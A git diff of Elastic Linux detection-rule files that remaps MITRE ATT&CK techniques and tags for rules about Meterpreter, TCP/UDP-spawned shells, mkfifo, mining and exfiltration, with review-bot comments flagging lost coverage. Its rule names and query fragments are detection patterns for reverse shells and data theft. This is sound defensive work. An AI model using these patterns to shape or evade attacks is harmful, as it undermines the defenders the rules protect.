@@ -111,26 +118,29 @@ Meterpreter is a sophisticated payload within the Metasploit framework, enabling framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat.technique]] -id = "T1087" -name = "Account Discovery" -reference = "https://attack.mitre.org/techniques/T1087/" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat.technique.subtechnique]] -id = "T1087.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1087/001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_suspicious_binary.toml b/rules/linux/execution_shell_via_suspicious_binary.toml index 356cfbbcded..ed5b8943ef7 100644 --- a/rules/linux/execution_shell_via_suspicious_binary.toml +++ b/rules/linux/execution_shell_via_suspicious_binary.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] 
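Review bot: All three Discovery techniques (T1016, T1082, T1087.001) are removed from execution_shell_via_meterpreter_linux and nothing Discovery-related replaces them, yet the rule's setup still installs an audit watch on `/etc/passwd` (`-w /etc/passwd -p wa -k passwd` in the previous hunk's context), i.e. the telemetry it consumes is account and system enumeration performed from the Meterpreter shell. If the query still fires on those reads, keep a TA0007 entry next to the new Execution and C2 ones; otherwise the setup text should be trimmed to match the new scope.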
@@ -83,7 +83,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=1s @@ -109,19 +116,6 @@ sequence by host.id, process.entity_id with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -136,3 +130,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml b/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml index 3623af76665..c8be644cd99 100644 --- a/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml +++ b/rules/linux/execution_shell_via_tcp_cli_utility_linux.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/07/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -82,7 +82,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence by host.id with maxspan=5s @@ -99,19 +106,6 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" @@ -126,3 +120,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" 
diff --git a/rules/linux/execution_shell_via_udp_cli_utility_linux.toml b/rules/linux/execution_shell_via_udp_cli_utility_linux.toml index 80a1c2d1c61..35f575a8b8e 100644 --- a/rules/linux/execution_shell_via_udp_cli_utility_linux.toml +++ b/rules/linux/execution_shell_via_udp_cli_utility_linux.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/04" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -95,7 +95,14 @@ However, if more advanced configuration is required to detect specific behavior, - For this detection rule no additional audit rules are required to be added to the integration. """ severity = "medium" -tags = ["Tactic: Command and Control", "Tactic: Execution", "Data Source: Auditd Manager", "Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -120,19 +127,6 @@ sample by host.id, process.pid, process.parent.pid [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" 
@@ -147,3 +141,16 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml b/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml index c5e14b5e1f1..19461e6ab6b 100644 --- a/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml +++ b/rules/linux/execution_sus_extraction_or_decrompression_via_funzip.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/26" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] @@ -85,7 +85,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -99,16 +109,29 @@ not (process.parent.name in ("sh", "sudo") and ?process.parent.command_line : "* [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.015" -name = "Compression" -reference = "https://attack.mitre.org/techniques/T1027/015/" - [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" diff --git a/rules/linux/execution_suspicious_executable_running_system_commands.toml b/rules/linux/execution_suspicious_executable_running_system_commands.toml index 9dde89eea91..880ff976e63 100644 --- a/rules/linux/execution_suspicious_executable_running_system_commands.toml +++ b/rules/linux/execution_suspicious_executable_running_system_commands.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/19" [rule] author = ["Elastic"] 
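Review bot: The T1027.015 Compression sub-technique is removed while T1027 and T1140 stay, which for a rule about extraction or decompression via funzip drops the one sub-technique that names the detected behaviour; unless the project has decided against sub-technique mappings, keep it. The tactic for the retained T1027/T1140 block is outside this hunk but is presumably still TA0005, and the tags hunk on the previous line replaced `"Tactic: Defense Evasion"` with `"Tactic: Execution"` instead of adding it, leaving that tactic untagged.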
@@ -81,7 +81,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -113,39 +121,20 @@ process.parent.executable:(
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1016"
-name = "System Network Configuration Discovery"
-reference = "https://attack.mitre.org/techniques/T1016/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique]]
-id = "T1033"
-name = "System Owner/User Discovery"
-reference = "https://attack.mitre.org/techniques/T1033/"
-
-[[rule.threat.technique]]
-id = "T1049"
-name = "System Network Connections Discovery"
-reference = "https://attack.mitre.org/techniques/T1049/"
-
-[[rule.threat.technique]]
-id = "T1057"
-name = "Process Discovery"
-reference = "https://attack.mitre.org/techniques/T1057/"
-
-[[rule.threat.technique]]
-id = "T1082"
-name = "System Information Discovery"
-reference = "https://attack.mitre.org/techniques/T1082/"
-
-[[rule.threat.technique]]
-id = "T1083"
-name = "File and Directory Discovery"
-reference = "https://attack.mitre.org/techniques/T1083/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
 [rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.parent.name"]
diff --git a/rules/linux/execution_suspicious_mining_process_creation_events.toml b/rules/linux/execution_suspicious_mining_process_creation_events.toml
index d66c1399690..30a5f83b43b 100644
--- a/rules/linux/execution_suspicious_mining_process_creation_events.toml
+++ b/rules/linux/execution_suspicious_mining_process_creation_events.toml
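Review bot: All six Discovery techniques (T1016, T1033, T1049, T1057, T1082, T1083) and the TA0007 tactic are replaced by a single T1059.004 / Execution mapping, so the ATT&CK coverage for the system commands this rule is named after disappears instead of being extended; the tags hunk for this file makes the matching swap of `"Tactic: Discovery"` for `"Tactic: Execution"`. Keeping the Discovery techniques as a second `[[rule.threat]]` block next to the new Execution one (the way execution_suspicious_pod_or_container_creation_command_execution.toml carries two tactics in this commit) preserves the existing coverage. The same wholesale replacement of an existing, behaviour-specific mapping recurs in execution_suspicious_mining_process_creation_events.toml (T1496, T1543.002), execution_system_binary_file_permission_change.toml (T1222.002 for a chmod rule), execution_tc_bpf_filter.toml (T1562.004), execution_unknown_rwx_mem_region_binary_executed.toml (T1106) and execution_unusual_kthreadd_execution.toml (T1014).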
@@ -2,7 +2,7 @@
 creation_date = "2023/02/08"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/19"
 [rule]
 author = ["Elastic"]
@@ -77,7 +77,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Crowdstrike",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -97,29 +107,16 @@ file where host.os.type == "linux" and event.type == "creation" and event.action
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1496"
-name = "Resource Hijacking"
-reference = "https://attack.mitre.org/techniques/T1496/"
-
-[rule.threat.tactic]
-id = "TA0040"
-name = "Impact"
-reference = "https://attack.mitre.org/tactics/TA0040/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
 [[rule.threat.technique.subtechnique]]
-id = "T1543.002"
-name = "Systemd Service"
-reference = "https://attack.mitre.org/techniques/T1543/002/"
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
 [rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/execution_suspicious_mkfifo_execution.toml b/rules/linux/execution_suspicious_mkfifo_execution.toml
index 1d324c1339f..2db8e46b29d 100644
--- a/rules/linux/execution_suspicious_mkfifo_execution.toml
+++ b/rules/linux/execution_suspicious_mkfifo_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/30"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/02"
 [rule]
 author = ["Elastic"]
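Review bot: The hunk header shows this rule's query is `file where ... event.type == "creation"`, a file-creation event, yet the only technique left after the hunk is T1059.004 Unix Shell, which describes shell interpreter execution and not the file activity the rule actually matches. T1496 Resource Hijacking, the technique that names the behaviour in the file name (mining), and the T1543.002 Systemd Service persistence mapping are both removed along with their tactics. If Execution coverage is the goal, keep the T1496/TA0040 block as its own `[[rule.threat]]` entry and add the Execution entry beside it rather than in its place.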
@@ -84,7 +84,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike", "Data Source: SentinelOne"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Tactic: Command and Control",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+ "Data Source: Crowdstrike",
+ "Data Source: SentinelOne",
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -96,6 +106,11 @@ process.args:((/dev/shm/* or /tmp/* or /var/tmp/*) and not (/*fifo* or /var/tmp/
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[rule.threat.tactic]
+name = "Execution"
+id = "TA0002"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
@@ -106,15 +121,19 @@ id = "T1059.004"
 name = "Unix Shell"
 reference = "https://attack.mitre.org/techniques/T1059/004/"
-[[rule.threat.technique]]
-id = "T1559"
-name = "Inter-Process Communication"
-reference = "https://attack.mitre.org/techniques/T1559/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+name = "Command and Control"
+id = "TA0011"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat.technique]]
+name = "Application Layer Protocol"
+id = "T1071"
+reference = "https://attack.mitre.org/techniques/T1071/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["host.id", "process.command_line"]
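Review bot: The two rewritten threat entries in the `@@ -96,6 +106,11 @@` and `@@ -106,15 +121,19 @@` hunks place `[rule.threat.tactic]` before the `[[rule.threat.technique]]` array and write `name` before `id`, whereas every other rule touched by this commit keeps technique-then-tactic with `id` first; the same inverted layout shows up again in execution_unusual_kthreadd_execution.toml, exfiltration_potential_curl_data_exfiltration.toml, exfiltration_potential_database_dumping.toml and exfiltration_potential_wget_data_exfiltration.toml. TOML parses both orders identically, but mixed ordering makes the `[[rule.threat]]` blocks harder to compare across rules and will churn again under any normaliser. Separately, T1559 Inter-Process Communication is dropped even though mkfifo creates a named pipe, which is exactly the IPC primitive the rule is named for; given the C2/T1071 entry is added beside the Execution one, keeping T1559 in the Execution technique list looks like the intended shape.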
diff --git a/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml b/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml
index 7fcc1c718a0..a35ae4ec714 100644
--- a/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml
+++ b/rules/linux/execution_suspicious_pod_or_container_creation_command_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/12/01"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/08"
 [rule]
 author = ["Elastic"]
@@ -58,7 +58,21 @@ This rule flags pods or containers started via orchestration or runtime tools th
 risk_score = 47
 rule_id = "c595363f-52a6-49e1-9257-0e08ae043dbd"
 severity = "medium"
-tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "Domain: Container",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Tactic: Privilege Escalation",
+ "Tactic: Persistence",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame",
+ "Data Source: Auditd Manager",
+ "Data Source: Crowdstrike",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -103,9 +117,17 @@ reference = "https://attack.mitre.org/tactics/TA0002/"
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1037"
-name = "Boot or Logon Initialization Scripts"
-reference = "https://attack.mitre.org/techniques/T1037/"
+id = "T1611"
+name = "Escape to Host"
+reference = "https://attack.mitre.org/techniques/T1611/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1053"
diff --git a/rules/linux/execution_system_binary_file_permission_change.toml b/rules/linux/execution_system_binary_file_permission_change.toml
index a9a9dab2bc1..c9804ea2744 100644
--- a/rules/linux/execution_system_binary_file_permission_change.toml
+++ b/rules/linux/execution_system_binary_file_permission_change.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/01/07"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/19"
 [rule]
 author = ["Elastic"]
@@ -78,7 +78,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -110,16 +117,11 @@ process.args in ("4755", "755", "000", "777", "444", "+x") and not (
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1222"
-name = "File and Directory Permissions Modification"
-reference = "https://attack.mitre.org/techniques/T1222/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1222.002"
-name = "Linux and Mac File and Directory Permissions Modification"
-reference = "https://attack.mitre.org/techniques/T1222/002/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/execution_tc_bpf_filter.toml b/rules/linux/execution_tc_bpf_filter.toml
index ea6f456d2d8..52cc47e2b35 100644
--- a/rules/linux/execution_tc_bpf_filter.toml
+++ b/rules/linux/execution_tc_bpf_filter.toml
@@ -2,7 +2,7 @@
 creation_date = "2022/07/11"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/19"
 [rule]
 author = ["Elastic"]
@@ -90,7 +90,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: TripleCross", "Tactic: Defense Evasion", "Data Source: Auditd Manager", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Threat: TripleCross",
+ "Data Source: Auditd Manager",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: SentinelOne",
+ "Data Source: Crowdstrike",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -104,16 +116,16 @@ not ?process.parent.executable == "/usr/sbin/libvirtd"
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1562"
-name = "Impair Defenses"
-reference = "https://attack.mitre.org/techniques/T1562/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
 [[rule.threat.technique.subtechnique]]
-id = "T1562.004"
-name = "Disable or Modify System Firewall"
-reference = "https://attack.mitre.org/techniques/T1562/004/"
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml b/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml
index a12234501a0..6c81fd12cc5 100644
--- a/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml
+++ b/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/03/13"
 integration = ["auditd_manager"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/19"
 [rule]
 author = ["Elastic"]
@@ -100,14 +100,20 @@ event.category:process and host.os.type:linux and auditd.data.syscall:mprotect a
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1106"
-name = "Native API"
-reference = "https://attack.mitre.org/techniques/T1106/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.name"]
diff --git a/rules/linux/execution_unusual_kthreadd_execution.toml b/rules/linux/execution_unusual_kthreadd_execution.toml
index 10ee7be4397..fb453b1a848 100644
--- a/rules/linux/execution_unusual_kthreadd_execution.toml
+++ b/rules/linux/execution_unusual_kthreadd_execution.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/30"
 integration = ["endpoint", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/10/17"
 [rule]
 author = ["Elastic"]
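Review bot: The `@@ -100,14 +100,20 @@` hunk header shows this rule keys on `auditd.data.syscall:mprotect`, a syscall-level signal, but the hunk swaps T1106 Native API for T1059.004 Unix Shell, which is about shell interpreters and says nothing about an mprotect-based detection. The tactic already was Execution (the `[rule.threat.tactic]` lines are unchanged context), so nothing forces the technique to change; keeping `id = "T1106"` as a second `[[rule.threat.technique]]` under the same entry lets the mapping still state what the rule observes while adding the shell technique.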
@@ -81,7 +81,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: Crowdstrike"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+ "Data Source: Crowdstrike",
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -109,33 +117,21 @@ process.command_line:(
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1014"
-name = "Rootkit"
-reference = "https://attack.mitre.org/techniques/T1014/"
+ [rule.threat.tactic]
+ name = "Execution"
+ id = "TA0002"
+ reference = "https://attack.mitre.org/tactics/TA0002/"
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+ [[rule.threat.technique]]
+ id = "T1059"
+ name = "Command and Scripting Interpreter"
+ reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
+ [[rule.threat.technique.subtechnique]]
+ name = "Unix Shell"
+ id = "T1059.004"
+ reference = "https://attack.mitre.org/techniques/T1059/004/"
